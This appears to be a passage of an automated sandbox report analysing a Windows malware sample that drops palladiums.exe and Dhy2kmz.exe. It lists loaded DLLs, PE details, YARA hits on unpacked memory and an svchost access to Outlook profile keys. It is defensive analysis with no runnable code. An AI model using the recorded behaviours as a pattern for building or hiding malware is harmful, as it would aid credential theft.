                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                Source: 9876567899.bat.exeStatic file information: File size 1176576 > 1048576
                Source: 9876567899.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: 9876567899.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: 9876567899.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: 9876567899.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: 9876567899.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: 9876567899.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: 9876567899.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Dhy2kmz.exe, 00000004.00000002.2170113887.0000000006900000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: palladiums.exe, 00000002.00000003.2024229175.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000002.00000003.2024732170.0000000003A10000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: palladiums.exe, 00000002.00000003.2024229175.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000002.00000003.2024732170.0000000003A10000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Dhy2kmz.exe, 00000004.00000002.2170113887.0000000006900000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmp
                Source: 9876567899.bat.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: 9876567899.bat.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: 9876567899.bat.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: 9876567899.bat.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: 9876567899.bat.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                Data Obfuscation

                barindex
                Source: 4.2.Dhy2kmz.exe.6720000.9.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                Source: 4.2.Dhy2kmz.exe.6720000.9.raw.unpack, ListDecorator.cs.Net Code: Read
                Source: 4.2.Dhy2kmz.exe.6720000.9.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                Source: 4.2.Dhy2kmz.exe.6720000.9.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                Source: 4.2.Dhy2kmz.exe.6720000.9.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                Source: 4.2.Dhy2kmz.exe.46fa4a8.2.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                Source: 4.2.Dhy2kmz.exe.46fa4a8.2.raw.unpack, ListDecorator.cs.Net Code: Read
                Source: 4.2.Dhy2kmz.exe.46fa4a8.2.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                Source: 4.2.Dhy2kmz.exe.46fa4a8.2.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                Source: 4.2.Dhy2kmz.exe.46fa4a8.2.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                Source: 4.2.Dhy2kmz.exe.46aa488.5.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                Source: 4.2.Dhy2kmz.exe.46aa488.5.raw.unpack, ListDecorator.cs.Net Code: Read
                Source: 4.2.Dhy2kmz.exe.46aa488.5.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                Source: 4.2.Dhy2kmz.exe.46aa488.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                Source: 4.2.Dhy2kmz.exe.46aa488.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                Source: 4.2.Dhy2kmz.exe.6900000.11.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 4.2.Dhy2kmz.exe.6900000.11.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 4.2.Dhy2kmz.exe.6900000.11.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                Source: Yara matchFile source: 4.2.Dhy2kmz.exe.67c0000.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Dhy2kmz.exe.3ec4318.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Dhy2kmz.exe.458c248.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Dhy2kmz.exe.458c248.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Dhy2kmz.exe.67c0000.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Dhy2kmz.exe.42b31a8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Dhy2kmz.exe.3f7cde8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2140487819.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2153883300.0000000003E1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2169163154.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Dhy2kmz.exe PID: 6552, type: MEMORYSTR
                Source: Yara matchFile source: 14.2.palladiums.exe.ad0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 26.2.palladiums.exe.1540000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.palladiums.exe.31e0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 36.2.palladiums.exe.2010000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.palladiums.exe.e30000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.palladiums.exe.3cf0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.palladiums.exe.4130000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 31.2.palladiums.exe.1a60000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.2.palladiums.exe.1340000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 25.2.palladiums.exe.11b0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.palladiums.exe.3b50000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.palladiums.exe.1b30000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.palladiums.exe.3a80000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.palladiums.exe.38b0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.palladiums.exe.f20000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.palladiums.exe.1570000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.palladiums.exe.1830000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.palladiums.exe.18f0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 25.2.palladiums.exe.11b0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.palladiums.exe.1440000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.palladiums.exe.3a80000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.2.palladiums.exe.1340000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 26.2.palladiums.exe.1540000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.palladiums.exe.3680000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.palladiums.exe.1830000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.palladiums.exe.14d0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.palladiums.exe.18f0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.palladiums.exe.37a0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.palladiums.exe.e30000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.palladiums.exe.31e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.palladiums.exe.1670000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 22.2.palladiums.exe.3830000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.2.palladiums.exe.2ee0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.palladiums.exe.4130000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.palladiums.exe.3990000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.palladiums.exe.3b50000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.palladiums.exe.1570000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.palladiums.exe.f20000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.palladiums.exe.14d0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.palladiums.exe.3990000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 22.2.palladiums.exe.3830000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 36.2.palladiums.exe.2010000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.2.palladiums.exe.2ee0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.palladiums.exe.3680000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.palladiums.exe.ad0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.2.palladiums.exe.3a70000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.palladiums.exe.1440000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.2.palladiums.exe.3a70000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.palladiums.exe.1b30000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.2.palladiums.exe.3b60000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.2.palladiums.exe.3b60000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 31.2.palladiums.exe.1a60000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.palladiums.exe.38b0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.palladiums.exe.3cf0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.palladiums.exe.37a0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.palladiums.exe.1670000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7092, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7220, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7276, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7304, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7364, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7432, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7500, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7544, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7576, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7600, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7620, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7672, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7696, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7716, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7736, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7760, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7780, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7800, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7820, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7856, type: MEMORYSTR
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_007142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007142DE
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_00730A76 push ecx; ret 0_2_00730A89
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_00050A76 push ecx; ret 2_2_00050A89
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_064E5668 push es; iretd 4_2_064E5680
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_064EC619 push esp; ret 4_2_064EC625
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_064E2F43 push es; iretd 4_2_064E2F5C
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_064E1F1A push es; iretd 4_2_064E1F1C
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_064E7D4E push es; retf 4_2_064E7D54
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_064EEDD0 push eax; ret 4_2_064EEDD1
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_064E85B2 push es; ret 4_2_064E85B4
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_0668A62E push es; retf 4_2_0668A634
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_0668A6DC push es; ret 4_2_0668A6E8
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_06682E8A push es; ret 4_2_06682EB8
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_06686F08 push eax; iretd 4_2_06686F09
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_06683B9C pushad ; ret 4_2_06683B9D
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_06686901 push edx; retf 4_2_0668690B
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_066A7252 push eax; ret 4_2_066A7259
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_06713E76 push 3AE80390h; retf 4_2_06713E7B
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_0671B871 push ss; retf 4_2_0671B874
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_0671C066 push ds; ret 4_2_0671C06C
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_067148F3 push es; ret 4_2_067148F4
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_06961C16 push es; ret 4_2_06961C18
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_06961C41 push es; iretd 4_2_06961C44
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_06965D10 push eax; iretd 4_2_06965D1D
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_06966D05 push es; iretd 4_2_06966D30
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_06966D31 push es; ret 4_2_06966D64
